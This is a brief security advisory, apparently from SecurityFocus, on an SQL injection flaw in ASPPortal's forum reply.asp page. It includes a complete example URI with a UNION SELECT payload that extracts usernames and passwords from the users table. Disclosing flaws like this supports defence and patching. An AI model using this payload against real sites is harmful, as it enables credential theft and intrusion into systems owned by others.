ASPPortal 'reply.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/PATH/content/forums/reply.asp?Forum_Id=3&Topic_Id=6+and+1=2+union+select+1,2,3,4,Password,6,7,Username,9,0,1,2,3,4,5+from+users


 

Privacy Statement
Copyright 2010, SecurityFocus